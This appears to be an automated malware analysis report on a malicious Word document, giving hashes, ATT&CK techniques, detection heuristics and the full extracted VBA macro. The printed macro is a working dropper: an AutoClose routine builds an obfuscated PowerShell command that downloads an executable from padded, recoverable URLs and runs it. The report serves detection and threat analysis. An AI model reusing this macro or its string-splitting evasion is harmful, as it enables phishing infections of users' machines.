Office (OOXML) malware analysis — malicious · a71f44ca166719b8

MALICIOUS

Office (OOXML)

74.8 KB Created: 2017-05-22 22:37:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2017-10-10

MD5: 2747831d2fda4be53cf99bbc4897c312 SHA-1: 3a17d44f629a00eab8cca47c46a6f13afd4764b5 SHA-256: a71f44ca166719b82c4e1b3759034da045413ed8641c95a0a7fddf35ab8d6010

290 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that utilize WScript.Shell to execute a PowerShell command. This PowerShell command is obfuscated and attempts to download a second-stage executable from a reconstructed URL and execute it. The AutoClose macro is triggered upon document closure, initiating the malicious chain.

Heuristics 8

ClamAV: Doc.Phishing.Trojan-f0f00f1e320f0ff8-10045462-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Phishing.Trojan-f0f00f1e320f0ff8-10045462-0
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

DLBcofVTDVIzTmNlXsHWp = "powe" + "rshell $PlsH = ne" + "w-ob" + "ject Sys" + "tem.Ne" + "t.Web" + "Client;$vwcWBeyCsF = new-ob" + "ject ra" + "ndom;  "
           CreateObject("WScript.Shell").Run DLBcofVTDVIzTmNlXsHWp + nIiYwRJddlCayKSKFeNDzO, 0
End Function

Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Matched line in script
```
DLBcofVTDVIzTmNlXsHWp = "powe" + "rshell $PlsH = ne" + "w-ob" + "ject Sys" + "tem.Ne" + "t.Web" + "Client;$vwcWBeyCsF = new-ob" + "ject ra" + "ndom;  "
           CreateObject("WScript.Shell").Run DLBcofVTDVIzTmNlXsHWp + nIiYwRJddlCayKSKFeNDzO, 0
End Function
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

DLBcofVTDVIzTmNlXsHWp = "powe" + "rshell $PlsH = ne" + "w-ob" + "ject Sys" + "tem.Ne" + "t.Web" + "Client;$vwcWBeyCsF = new-ob" + "ject ra" + "ndom;  "
           CreateObject("WScript.Shell").Run DLBcofVTDVIzTmNlXsHWp + nIiYwRJddlCayKSKFeNDzO, 0
End Function

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub AutoClose()
Dim vRkOwyDxdv
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1688 bytes
SHA-256: `e59279c37a3d1299425ad311858c3102a75d9dcd706e92bae0ed45b258f3ac93`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoClose() Dim vRkOwyDxdv Dim rRHERsKThwuJDJqXINQU Dim PJVjoCGuvWJcuUPrPXaaf rRHERsKThwuJDJqXINQU = "$zwFN = 'hxrHtxrHtxrHpxrH:xrH/xrH/xrHlxrHoxrHsxrHtxrHgxrHoxrHnxrHexrHfxrHlxrH.xrHtxrHoxrHpxrH/xrH1xrH,xrHhxrHtxrHtxrHpxrH:xrH/xrH/xrHtxrHsxrHixrHvxrHnxrH.xrHcxrHoxrHmxrH.xrHvxrHnxrH/xrHsxrHyxrHsxrHtxrHexrHmxrH/xrHlxrHoxrHgxrHsxrH/xrH.xrH.xrH.xrH/xrH1xrH,xrHhxrHtxrHtxrHpxrH:xrH/xrH/xrHlxrHoxrHnxrHgxrHvxrHaxrHnxrHcxrHexrHrxrHaxrHmxrHixrHcxrHsxrH.xrHcxrHoxrHmxrH.xrHvxrHnxrH/xrHixrHmxrHaxrHgxrHexrH/xrHfxrHlxrHaxrHgxrHsxrH/xrH.xrH.xrH.xrH/xrH1' -replace 'xrH', '';" vRkOwyDxdv = "$JiebIEvQT = $zwFN.Split(',');$JmXtLgjKU = $vwcWBeyCsF.next(1, 65536);$oitSt = $env:temp + '' + $JmXtLgjKU + '.exe';foreach($dQisrnXOPk in $JiebIEvQT){try{$PlsH.DownloadFile($dQisrnXOPk.ToString(), $oitSt);Start-Process $oitSt;break;}catch{write-host $_.Exception.Message;}}" PJVjoCGuvWJcuUPrPXaaf = rRHERsKThwuJDJqXINQU + vRkOwyDxdv YPSbUGfoGEzpLjDXKZRHwFqh (PJVjoCGuvWJcuUPrPXaaf) End Sub Function YPSbUGfoGEzpLjDXKZRHwFqh(nIiYwRJddlCayKSKFeNDzO) Dim DLBcofVTDVIzTmNlXsHWp DLBcofVTDVIzTmNlXsHWp = "powe" + "rshell $PlsH = ne" + "w-ob" + "ject Sys" + "tem.Ne" + "t.Web" + "Client;$vwcWBeyCsF = new-ob" + "ject ra" + "ndom; " CreateObject("WScript.Shell").Run DLBcofVTDVIzTmNlXsHWp + nIiYwRJddlCayKSKFeNDzO, 0 End Function Attribute VB_Name = "Module1" Attribute VB_Name = "Module2"
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	15360 bytes
SHA-256: `26e5267036a4911bdc09dbec4c05441bc1ff9d0b0e1e474cf798d3ba298718a0`

Open this report in the interactive analyzer, or submit your own file for analysis.